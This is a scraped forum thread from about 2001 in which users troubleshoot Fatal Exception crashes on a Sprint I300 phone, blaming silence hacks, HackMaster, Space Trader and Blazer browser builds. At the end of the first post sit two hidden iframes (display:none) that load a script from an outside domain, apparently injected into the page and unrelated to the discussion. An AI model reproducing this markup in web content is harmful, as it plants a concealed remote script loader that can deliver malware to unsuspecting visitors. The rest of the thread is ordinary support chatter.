+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Fatal Exception

Fatal Exception

In the five weeks that I have had the I300, I have had about four Fatal Exceptions that forced me to delete all the data and start over. Even after restoring via HotSync, I get the Fatal Exception. After deleting all the files in my Backup folder on the desktop I can reinstall 3rd party apps.

At first I thought the ABC News pqa was responsible. Then it happened when I exited Eudora mail. But this morning was strange. Everything worked fine last night, but this morning after I changed the battery, I got another Fatal Exception requiring complete deletion of files!!!

Can anyone help explain why this is happening? I don't want to give up on the phone, but this is more frustration than I want.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Had the same problem several times. I've narrowed it down to the following files (having it right now, actually):

1. All silence-related hacks and preferences.
    2. Saved Preferences
    3. Album to Go and related albums, album key, etc.
    4. Space Trader (a random game)

For some reason, a few or all of these programs seem to cause fatal exceptions, even on initial restoration -- and even though they work fine if installed later.

Of the items you list, I have everything set for silence too. Also, some stored preferences. I don't have PhotoToGo(?) or Space Trader. Maybe we can figure this out together.

Thanks for the response!!

I think it might be the silence programs and Space Trader. I just restored with everything except those things, and it worked. Space Trader causes a Fatal even when I reinstall it later -- unless I completely re-download it and install it anew (weird, must be something saved on the file). I have 4 files with "Silence" as the first part of the name -- I think deleting them was also crucial.

Fatal Reset

I think it has to do with x-master and hackmaster. I have had the same problem. That was my solution.

I don't use it anymore.

I have not used any hacks on the phone, and still have the problem. Although I do silence most systems sounds. The last application I used last night (before the battery change crash) was Blazer. Others have suspected that it may have something to do with it. I saw on another board that Sprint just released (11/2/01) Build 49 of Blazer. I will try that, and leave some sounds active, and hopefully that will correct it.

Thanks again for your help.

i actually use x-master with tall fonts hack and Silence, with no problems. the phone did freeze up on me when i had tealecho, which i deleted.

Blazer (from Sprint, latest version) and Hack Master (with Teal Script and Glance) have given me no problems.

I had the exact same problems and finally found out it was the Blazer software from Handspring that was doing it. Only the software from the Sprint web site works properly. Once I deleted the Blazer 2.0 software from Handspring and downloaded the Blazer 2.0 software from the Sprint site I have not had one problem.

Also note that Sprint has come out with a new software version. I purchased my first phone about three weeks ago from CompUSA and it had version S:I300.01.S.UI06 and PDA:0108:2800. I received another phone from Sprint last week and it had S:I300.01.S.UJ12 and PDA :0110:1200 so they are definitely upgrading the software already. Not sure why, does anyone know?

Administrator

Arrow

so they are definitely upgrading the software already. Not sure why, does anyone know?
    yeah... fixin' bugs! :p

Can you describe where you are able to locate these version numbers? I would like to be able to determine which version is installed on my i300.

Still no go (for me) with the Sprint Blazer 2.0

I felt that Blazer 2.0 was one of my (hard reset) problem applications. People have been saying that Blazer 2.0 from Sprint has been working great. So thought I'd try again.

I deleted the version (both Blazer and BrowseWeb) that came with my phone (1.1s6) and installed the one from the Sprint site. Did a soft reset before and after installing just to make sure it was a-okay.

Ran Blazer 2.0 for 15 minutes, it worked awesome for me but then I did a soft reset and I was stuck in theat weird place between resets. I had to do a HARD RESET to get out.

It's a nice browser, maybe the nicest, but the hard reset issue obviously wasn't acceptable, I need to feel confident I can do a soft reset when necessary.

I reinstalled 1.1s6 and now I'm a happy camper again.

Gary
    Last edited by garylapointe; 11-12-2001 at 07:25 PM.

With the phone on and the keypad screen displayed click the drop down menu button and go to options and click the version selection.

To avoid battery change crashes...
    1) use the bottom button to turn off the phone
    2) use the top button to turn off the screen
    3)change the battery
    4)turn on the screen
    5)turn on the phone
    NO MORE CRASHES!!!!

Originally posted by WhoDat
    I have not used any hacks on the phone, and still have the problem. Although I do silence most systems sounds. The last application I used last night (before the battery change crash) was Blazer. Others have suspected that it may have something to do with it. I saw on another board that Sprint just released (11/2/01) Build 49 of Blazer. I will try that, and leave some sounds active, and hopefully that will correct it.

Thanks again for your help.

Re: Still no go (for me) with the Sprint Blazer 2.0

Blazer 2.0, build 49 is on the SprintPCS website. This will work. No more Hard Resets!!

Originally posted by garylapointe
    I felt that Blazer 2.0 was one of my (hard reset) problem applications. People have been saying that Blazer 2.0 from Sprint has been working great. So thought I'd try again.

I deleted the version (both Blazer and BrowseWeb) that came with my phone (1.1s6) and installed the one from the Sprint site. Did a soft reset before and after installing just to make sure it was a-okay.

Ran Blazer 2.0 for 15 minutes, it worked awesome for me but then I did a soft reset and I was stuck in theat weird place between resets. I had to do a HARD RESET to get out.

It's a nice browser, maybe the nicest, but the hard reset issue obviously wasn't acceptable, I need to feel confident I can do a soft reset when necessary.

I reinstalled 1.1s6 and now I'm a happy camper again.

Gary

Build 49 was the last version I tried when making the previous post. I had typed that info at one point, but I must have accidentally edited it out.

Gary

I'm using Blazer 2.0, build 49 (accessed thru Browse Web) and it works flawlessly. I have about 30 bookmarks and have been to the sites over and over.

When I tried to use the Blazer beta (stand-a-lone app without accessing it thru Browse Web), it crashed every 4 minutes.

Did you install the Browse Web that came as part of the Blazer pack from Sprint PCS??:o

Dan
    Yep... Build 49 here as well with no problems. I use it every day !

Originally posted by lizardhowson
    When I tried to use the Blazer beta (stand-a-lone app without accessing it thru Browse Web), it crashed every 4 minutes.
    Mine didn't do this, it worked flawlessly for 20 minutes until I did a soft reset (have you tried a soft reset?). The it did the blinky thing and locked up. I've tested this several the last time I tried it and it had that soft rest problem then too.

Originally posted by lizardhowson
    Did you install the Browse Web that came as part of the Blazer pack from Sprint PCS??:o
    Yes.

lizardhowson and Dan: Have you done a soft reset lately? (Are you willing to try it?)

Thanks,
    Gary

Dan
    Originally posted by garylapointe
    lizardhowson and Dan: Have you done a soft reset lately? (Are you willing to try it?)
    Sure!

So I did a soft reset... But I'm still not having any problems. I'm using the Blazer that came from Sprint PCS - the one labeled "Browse Web". I've used the Palm for about twenty minutes today, and the Browse Web functionality for about five.